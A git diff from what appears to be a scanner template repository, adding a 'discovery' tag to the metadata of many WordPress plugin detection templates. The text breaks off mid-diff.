--git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index 54fdd22b0f9..bf458f54d25 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: newsletter wpscan: https://wpscan.com/plugin/newsletter - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index e2f020a0101..3b4c65075db 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: nextend-facebook-connect wpscan: https://wpscan.com/plugin/nextend-facebook-connect - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index 6057a935d5c..638caf0a181 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: nextgen-gallery wpscan: https://wpscan.com/plugin/nextgen-gallery - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index f3814383052..a284f13f76e 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: ninja-forms wpscan: https://wpscan.com/plugin/ninja-forms - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index bd2e2cf2544..f23feec1ad5 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: ocean-extra wpscan: https://wpscan.com/plugin/ocean-extra - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index 91b999d33d3..a9776d9a5dc 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: official-facebook-pixel wpscan: https://wpscan.com/plugin/official-facebook-pixel - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index 411144a2664..8f5a9502483 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: one-click-demo-import wpscan: https://wpscan.com/plugin/one-click-demo-import - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 3b858e54407..259e9939d88 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: optinmonster wpscan: https://wpscan.com/plugin/optinmonster - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index c92531ea574..767fde92e91 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: otter-blocks wpscan: https://wpscan.com/plugin/otter-blocks - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index c40212fa446..737039b9cf1 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: password-protected wpscan: https://wpscan.com/plugin/password-protected - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index a09278e4839..7e5d4687165 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: pdf-embedder wpscan: https://wpscan.com/plugin/pdf-embedder - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/photo-gallery.yaml b/http/technologies/wordpress/plugins/photo-gallery.yaml index ec1f93ab9cc..59c432042f9 100644 --- a/http/technologies/wordpress/plugins/photo-gallery.yaml +++ b/http/technologies/wordpress/plugins/photo-gallery.yaml @@ -10,7 +10,7 @@ info: max-request: 1 plugin_namespace: photo-gallery wpscan: https://wpscan.com/plugin/photo-gallery - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/php-compatibility-checker.yaml b/http/technologies/wordpress/plugins/php-compatibility-checker.yaml index 8615281ebac..7f59c7d79eb 100644 --- a/http/technologies/wordpress/plugins/php-compatibility-checker.yaml +++ b/http/technologies/wordpress/plugins/php-compatibility-checker.yaml @@ -10,7 +10,7 @@ info: max-request: 1 plugin_namespace: php-compatibility-checker wpscan: https://wpscan.com/plugin/php-compatibility-checker - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index 01335640f5d..bffec829d55 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: pinterest-for-woocommerce wpscan: https://wpscan.com/plugin/pinterest-for-woocommerce - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 3a23ee03c52..645ba629dde 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: pixelyoursite wpscan: https://wpscan.com/plugin/pixelyoursite - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index cd41dfb9b81..30a0b7fb4f1 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: polylang wpscan: https://wpscan.com/plugin/polylang - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml index dda5dd45181..a89e75e1f17 100644 --- a/http/technologies/wordpress/plugins/popup-builder.yaml +++ b/http/technologies/wordpress/plugins/popup-builder.yaml @@ -10,7 +10,7 @@ info: max-request: 1 plugin_namespace: popup-builder wpscan: https://wpscan.com/plugin/popup-builder - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 0de2a71c49e..b33970f06e2 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: popup-maker wpscan: https://wpscan.com/plugin/popup-maker - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index a710026cc7b..88a38be5d2d 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: post-smtp wpscan: https://wpscan.com/plugin/post-smtp - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index 7e9d7d287b5..777d0749bf6 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: post-types-order wpscan: https://wpscan.com/plugin/post-types-order - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 22a1c31edc3..69105dda1e0 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: premium-addons-for-elementor wpscan: https://wpscan.com/plugin/premium-addons-for-elementor - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 81c377e4242..fba4e61d448 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: pretty-link wpscan: https://wpscan.com/plugin/pretty-link - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index 84021bd7d2f..9935b1c68b5 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: really-simple-captcha wpscan: https://wpscan.com/plugin/really-simple-captcha - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 3a3e0b1a4f6..2a8d012558b 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: really-simple-ssl wpscan: https://wpscan.com/plugin/really-simple-ssl - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index 30279d2e47d..f2c91fb8464 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: redirection wpscan: https://wpscan.com/plugin/redirection - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 61e2a681c43..177109d7a6a 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: redux-framework wpscan: https://wpscan.com/plugin/redux-framework - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 53e18e0d46d..8e697f37330 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: regenerate-thumbnails wpscan: https://wpscan.com/plugin/regenerate-thumbnails - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml index 26c80ae44e9..f2c0e8ad427 100644 --- a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: royal-elementor-addons wpscan: https://wpscan.com/plugin/royal-elementor-addons - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index dc1f14fa2af..100ac7fcd78 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: safe-svg wpscan: https://wpscan.com/plugin/safe-svg - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index c377fea6437..ab773292c77 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: seo-by-rank-math wpscan: https://wpscan.com/plugin/seo-by-rank-math - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index 4873593a686..ad59f0ad256 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: sg-cachepress wpscan: https://wpscan.com/plugin/sg-cachepress - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index eca3e103c73..3f6695dd427 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: sg-security wpscan: https://wpscan.com/plugin/sg-security - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index 3b8fee8bb67..a8d08558c5f 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: shortcodes-ultimate wpscan: https://wpscan.com/plugin/shortcodes-ultimate - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 22795d9acf5..e9e650d74a9 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: shortpixel-image-optimiser wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 342a87a5d44..a379b170b8b 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: simple-custom-post-order wpscan: https://wpscan.com/plugin/simple-custom-post-order - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/simple-history.yaml b/http/technologies/wordpress/plugins/simple-history.yaml index b38eb7dce6a..c4afe0237b3 100644 --- a/http/technologies/wordpress/plugins/simple-history.yaml +++ b/http/technologies/wordpress/plugins/simple-history.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: simple-history wpscan: https://wpscan.com/plugin/simple-history - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/simple-page-ordering.yaml b/http/technologies/wordpress/plugins/simple-page-ordering.yaml index 430af96809c..f52c876d7e7 100644 --- a/http/technologies/wordpress/plugins/simple-page-ordering.yaml +++ b/http/technologies/wordpress/plugins/simple-page-ordering.yaml @@ -10,7 +10,7 @@ info: max-request: 1 plugin_namespace: simple-page-ordering wpscan: https://wpscan.com/plugin/simple-page-ordering - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 4c755f1f64e..941614bd05b 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: siteguard wpscan: https://wpscan.com/plugin/siteguard - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index 0e56311bb15..aed76ce7dfe 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: siteorigin-panels wpscan: https://wpscan.com/plugin/siteorigin-panels - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index 21d3e3fce51..17967f9003a 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: smart-slider-3 wpscan: https://wpscan.com/plugin/smart-slider-3 - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index d86e1b08c3d..3c13c4b1b0d 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: so-widgets-bundle wpscan: https://wpscan.com/plugin/so-widgets-bundle - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/speedycache.yaml b/http/technologies/wordpress/plugins/speedycache.yaml index 716933aa736..9f96cbc86bf 100644 --- a/http/technologies/wordpress/plugins/speedycache.yaml +++ b/http/technologies/wordpress/plugins/speedycache.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: speedycache wpscan: https://wpscan.com/plugin/speedycache - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml b/http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml index d85eb15f66b..99116087efe 100644 --- a/http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml +++ b/http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml @@ -10,7 +10,7 @@ info: max-request: 1 plugin_namespace: ssl-insecure-content-fixer wpscan: https://wpscan.com/plugin/ssl-insecure-content-fixer - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml index ffce40a2844..d853b6d8ff6 100644 --- a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: sticky-header-effects-for-elementor wpscan: https://wpscan.com/plugin/sticky-header-effects-for-elementor - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index b0cf7986ca9..9cc673ede08 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: stops-core-theme-and-plugin-updates wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 66ce3d75422..ce66e3f7eff 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: sucuri-scanner wpscan: https://wpscan.com/plugin/sucuri-scanner - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index 369635f985f..d55458c7174 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: svg-support wpscan: https://wpscan.com/plugin/svg-support - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index abaf179dbc3..b0df8dbda3d 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: table-of-contents-plus wpscan: https://wpscan.com/plugin/table-of-contents-plus - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index d077c86d158..53c512abcd0 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: tablepress wpscan: https://wpscan.com/plugin/tablepress - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 10cf2fc73e7..2871350ad4b 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: taxonomy-terms-order wpscan: https://wpscan.com/plugin/taxonomy-terms-order - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index 6e74744b22e..02d30cca616 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: templately wpscan: https://wpscan.com/plugin/templately - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index fb76e4f6586..5e59720b836 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: the-events-calendar wpscan: https://wpscan.com/plugin/the-events-calendar - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml index c8352a494c2..201cd347be4 100644 --- a/http/technologies/wordpress/plugins/themeisle-companion.yaml +++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml @@ -10,7 +10,7 @@ info: max-request: 1 plugin_namespace: themeisle-companion wpscan: https://wpscan.com/plugin/themeisle-companion - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index 058e4c03bb8..236daa1a1f2 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: tinymce-advanced wpscan: https://wpscan.com/plugin/tinymce-advanced - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 310eba4a316..9d3083d14a1 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: translatepress-multilingual wpscan: https://wpscan.com/plugin/translatepress-multilingual - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index f0bed45c8c3..1cec78d6503 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: ultimate-addons-for-gutenberg wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index efe757f75c0..a439d415b00 100644 --- 